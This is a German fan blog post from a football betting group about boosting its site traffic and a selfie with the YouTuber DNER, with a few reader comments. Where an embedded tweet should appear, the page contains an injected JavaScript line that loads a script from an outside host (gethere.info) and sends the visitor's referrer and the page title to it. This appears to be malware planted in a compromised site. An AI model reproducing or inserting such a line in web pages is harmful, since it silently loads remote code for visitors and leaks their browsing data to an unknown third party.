Vielleicht hat es ja jemand gemerkt: Die Schwarze Neun versucht seit einigen Tagen, die Traffic-Maschine für diese Seite anzuwerfen. Wir arbeiten jetzt suchmaschinenoptimiert und haben bereits nach wenigen Tagen neue Leser aus Kambodscha und Brasilien. Kein Scherz. Das weist zumindest die Tlaffic-Auswertung auf Google Analytics aus. Wie es richtig geht, haben wir jetzt von DNER erfahren.

Miles Selfie mit DNER

Da viele Unter-20-Jährige am Tippspiel der Schwarzen Neun teilnehmen, gehen wir stark davon aus, dass die wissen, von wem die Rede ist. DNER ist ein YouTuber, der Mile erzählt hat, dass er einfach nur sein Leben filmt und Spaß haben will. Gut, der Kerl lebt davon. Nicht schlecht. Sogar richtig gut. Daher versuchen wir jetzt den Traffic für die DS9-Seite mit einem Selfie von Mile und DNER aufzubessern. Es wird nicht viel helfen, was vermutlich an Mile liegt.

400 Millionen Clicks

Aber vielleicht interessiert es dennoch jemanden hier. Daher einige Erfolgszahlen von DNER. Der 20-jährige Kölner hat auf YouTube 2,4 Millionen Abonnenten. Seine Filme haben bereits insgesamt 400 Millionen Menschen, vorrangig Teenies, angeklickt. Zum Vergleich: Der YouTube-Channel der Schwarzen Neun hat einen Abonnenten. Aber immerhin wurden unsere Filme bereits 1522 Mal angeklickt. Ein Beispiel, was DNER alles so macht, könnte Ihr am folgenden Twitter-Post sehen, der auf einen seiner YouTube-Filme verlinkt.

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Ähnliche Beiträge

5 Responses

  1. Marcel

    +++ Breaking News +++
    In Ordnung, kurz vor dem Wochenende muss es raus:
    –> Hiermit oute ich mich als Stalker der Schwarzen Neun … Der (einzige) Abonnent des DS9-Channels bin ich. <–
    +++ Breaking News +++

    Antworten
    • Marcel

      dann zählen wir zwei halt nur zur Hälfte.
      Hut ab vor deinem VfBäh-Tipp!!!
      Und Spratz hat ein 2:0 auf Hertha getippt …!

      Antworten
  2. Mile

    Ich war über meinen VfB-Tipp selbst überrascht – positiv. Kommt ja nicht so häufig vor. Sag mal, bei mir geht seit Wochen die Kicktipp-App nicht mehr. Funktioniert die bei Dir?

    Antworten

Hinterlasse eine Antwort

Deine Email Adresse wird nicht veröffentlicht.